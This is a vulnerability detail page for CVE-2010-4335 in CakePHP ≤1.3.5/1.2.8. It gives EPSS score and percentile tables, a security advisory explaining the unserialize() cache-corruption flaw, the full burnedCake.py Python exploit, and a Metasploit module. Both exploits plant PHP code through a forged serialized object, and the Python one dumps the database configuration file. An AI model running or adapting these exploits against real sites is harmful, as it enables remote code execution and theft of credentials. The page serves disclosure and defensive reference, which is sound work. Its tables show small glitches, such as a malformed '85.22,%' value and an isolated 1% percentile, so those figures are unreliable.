CVE-2010-4335 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	82.07%	–	–
2022-03-06	–	–	81.53%	–	–
2022-06-05	–	–	81.53%	–	–
2023-03-12	–	–	–	94.26%	–
2023-05-28	–	–	–	93.78%	–
2023-07-16	–	–	–	92.95%	–
2023-09-10	–	–	–	92.93%	–
2023-12-17	–	–	–	93.17%	–
2024-02-04	–	–	–	92.65%	–
2024-03-17	–	–	–	92.24%	–
2024-06-02	–	–	–	92.24%	–
2024-06-16	–	–	–	91.64%	–
2024-09-08	–	–	–	92.17%	–
2024-12-22	–	–	–	92.36%	–
2025-01-19	–	–	–	92.36%	–
2025-03-18	–	–	–	–	84.21%
2025-03-30	–	–	–	–	85.22%
2025-03-30	–	–	–	–	85.22,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2022-03-06	99%
2022-06-05	1%
2023-03-12	99%
2023-05-28	99%
2023-07-16	99%
2023-09-10	99%
2023-12-17	99%
2024-02-04	99%
2024-03-17	99%
2024-06-02	99%
2024-06-16	99%
2024-09-08	99%
2024-12-22	99%
2025-01-19	99%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

Source: http://securityreason.com/securityalert/8026 CakePHP <= 1.3.5 / 1.2.8 unserialize() Vulnerability felix |at| malloc.im =========================================================================== ==== Overview: "CakePHP is a rapid development framework for PHP that provides an extensible architecture for developing, maintaining, and deploying applications. Using commonly known design patterns like MVC and ORM within the convention over configuration paradigm, CakePHP reduces development costs and helps developers write less code." - cakephp.org CakePHP is vulnerable to a file inclusion attack because of its use of the "unserialize()" function on unchecked user input. This makes it possible to inject arbitary objects into the scope. Details: CakePHP uses the following function in the Security component to protect against XSRF attacks with POST Requests: function _validatePost(&$controller) { -- snip -- $check = $controller->data; $token = urldecode($check['_Token']['fields']); if (strpos($token, ':')) { list($token, $locked) = explode(':', $token, 2); } $locked = unserialize(str_rot13($locked)); -- snip -- The $check array contains our POST data and $locked is a simple (rot-13 obfuscated) serialized string, which is completely under our control. PHP5 introduces a destructor with the "__destruct" method. Each object will execute its __destruct method at the end of its lifetime and we can use this to turn an unchecked unserialize() call in an useful exploit. (See Stefan Essers talk @ http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf for more information) CakePHP defines the App Class with the following destruct method: function __destruct() { if ($this->__cache) { $core = App::core('cake'); unset($this->__paths[rtrim($core[0], DS)]); Cache::write('dir_map', array_filter($this->__paths), '_cake_core_'); Cache::write('file_map', array_filter($this->__map), '_cake_core_'); Cache::write('object_map', $this->__objects, '_cake_core_'); } } As we can see, this method can be abused by an manipulated object to write arbitary values into the _cake_core Cache. The most interesting key to corrupt is the file_map. It provides the mapping between Classes and PHP Files and is used to load additional Classes at runtime. The real code for the loading of classes is a bit complicated but it all boils down to the following code in the __load method inside the App class: if (file_exists($file)) { if (!$this->return) { require($file); $this->__loaded[$file] = true; } return true; This means we can execute arbitary files on the local filesystem. CakePHP uses a file based caching system in its standard configuration, and the cache data is written in serialized form to a known location. We can use this information to create a create a manipulated App object that executes our PHP Payload: $x=new App(); $x->__cache=1; $x->__map=array("Core" => array("Router" => "../tmp/cache/persistent/cake_core_file_map"), "Foo" => "<? phpinfo(); exit(); ?>"); $x->__paths=array(); $x->__objects=array(); echo serialize($x); POC: See http://malloc.im/burnedcake.py for a working POC exploit. PoC also shown below. Patch: This bug was patched in Version 1.3.6 and 1.2.9 #!/usr/bin/python # # burnedCake.py - CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit # written by felix@malloc.im # # This code exploits a unserialize() vulnerability in the CakePHP security # component. See http://malloc.im/CakePHP-unserialize.txt for a detailed # analysis of the vulnerability. # # The exploit should work against every CakePHP based Application, that # uses POST forms with security tokens and hasn't changed the Cache # configuration (file-system caching is standard). Exploiting # other caching configurations is possible but not as elegant. # # This POC will output the database config file of the running CakePHP Application, # other payloads are easily possibe with a changed PHP Code. from optparse import OptionParser from urlparse import urlparse,urljoin import urllib2 import urllib import re def request(url,data="",headers={},debug=0): if (data==""): request = urllib2.Request(url=url,headers=headers) else: request = urllib2.Request(url=url,headers=headers,data=data) debug_handler = urllib2.HTTPHandler(debuglevel = debug) opener = urllib2.build_opener(debug_handler) response=opener.open(request) return response if __name__=="__main__": parser = OptionParser(usage="usage: %prog [options] url") parser.add_option("-p", "--post", dest="post", help="additional post content as urlencoded string") parser.add_option("-v", action="store_true", dest="verbose", help="verbose mode") (options, args) = parser.parse_args() if len(args)!=1: parser.error("wrong number of arguments") if options.verbose: debug=1 else: debug=0 if not options.post: options.post="" url=urlparse(args[0]) html=request(url.geturl(),debug=debug ).read() try: key=re.search("data\[_Token\]\[key\]\" value=\"(.*?)\"",html).group(1) path=re.search('method="post" action="(.*?)"',html).group(1) fields=re.search('data\[_Token\]\[fields\]" value="([0-9a-f]{32}).*?"',html).group(1) except: print "[x] Regex failed! :(" exit() # Add additional POST variables with the -p option, if they are needed for the # Form to be accepted. Example: Croogo Admin Panel Login if options.post: options.post="&"+options.post # This is a rot13 "encrypted" serialized CakePHP Object # This object will write 2 values in the cake_core_file_map Cache: # The PHP payload (readfile(....); exit();) and a new value # for the Core/Router entry that shows to the Cache representation # on the filesystem (tmp/cache/persistent_cake_core_filemap). # CakePHP tries to include the Router class and our payload # get's executed ==> Owned. (See the advisory for more details) payload='%3AB:3:"Ncc":4:{f:7:"__pnpur";f:3:"onz";f:5:"__znc";n:2:{f:4'+\ ':"Pber";n:1:{f:6:"Ebhgre";f:42:"../gzc/pnpur/crefvfgrag/pnxr_pber_sv'+\ 'yr_znc";}f:3:"Sbb";f:49:"<? ernqsvyr(\'../pbasvt/qngnonfr.cuc\'); rkv'+\ 'g(); ?>";}f:7:"__cnguf";n:0:{}f:9:"__bowrpgf";n:0:{}}' data={ "_method" : "POST", "data[_Token][key]" : key, "data[_Token][fields]" : fields+payload } url=urljoin(url.geturl(),path) # We execute the same request twice. # Our manipulated Cache write in the first request will be overwritten by # the legitimate App Object. The second request won't trigger a normal Cache # write again and our payload can get planted. request(url,urllib.urlencode(data)+options.post,debug=debug).read() request(url,urllib.urlencode(data)+options.post,debug=debug).read() print request(url,debug=debug).read()

## # $Id: cakephp_cache_corruption.rb 11579 2011-01-14 16:25:37Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit', 'Description' => %q{ CakePHP is a popular PHP framework for building web applications. The Security component of CakePHP is vulnerable to an unserialize attack which could be abused to allow unauthenticated attackers to execute arbitrary code with the permissions of the webserver. }, 'Author' => [ 'tdz', 'Felix Wilhelm', # poc ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 11579 $', 'References' => [ [ 'OSVDB', '69352' ], [ 'CVE', '2010-4335' ], [ 'BID', '44852' ], [ 'URL', 'http://packetstormsecurity.org/files/view/95847/burnedcake.py.txt' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { 'Space' => 4000, # max url length for some old versions of apache according to # http://www.boutell.com/newfaq/misc/urllength.html 'DisableNops' => true, #'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install 'Compat' => { 'ConnectionType' => 'find', }, 'Keys' => ['php'], }, 'Targets' => [ ['Automatic', { }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 15 2010' )) register_options( [ OptString.new('URI', [ true, "CakePHP POST path", '/']), OptString.new('OptionalPostData', [ false, "Optional POST data", '']), ], self.class) end def exploit #path = rand_text_alphanumeric(rand(5)+5) key = rand_text_alphanumeric(rand(5)+5) fields = rand_text_alphanumeric(rand(5)+5) #payload = "readfile('../config/database.php'); exit();" len=payload.encoded.length + 6 p = "" p << ':O:3:"App":4:{s:7:"__cache";s:3:"bam";s:5:"__map";a:2:{s:4' p << ':"Core";a:1:{s:6:"Router";s:42:"../tmp/cache/persistent/cake_core_file_map";}' p << 's:3:"Foo";s:' p << len.to_s() p << ':"<? ' p << payload.encoded p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}' #rot13 and urlencode p = p.tr("A-Ma-mN-Zn-z","N-Zn-zA-Ma-m") p = CGI.escape(p) data = "data%5b_Token%5d%5bkey%5d=" data << key data << "&data%5b_Token%5d%5bfields%5d=" data << fields data << p data << "&_method=POST" #some apps need the form post data if datastore['OptionalPostData'] postdata = CGI.escape(datastore['OptionalPostData']) data << "&" data << postdata end print_status("Sending exploit request 1") res = send_request_cgi( { 'uri' => datastore['URI'], 'method' => "POST", 'ctype' => 'application/x-www-form-urlencoded', 'data' => data }, 5) print_status("Sending exploit request 2") res = send_request_cgi( { 'uri' => datastore['URI'], 'method' => "POST", 'ctype' => 'application/x-www-form-urlencoded', 'data' => data },5) print_status("Requesting our payload") response = send_request_raw({ # Allow findsock payloads to work 'global' => true, 'uri' => datastore['URI'] }, 5) handler end end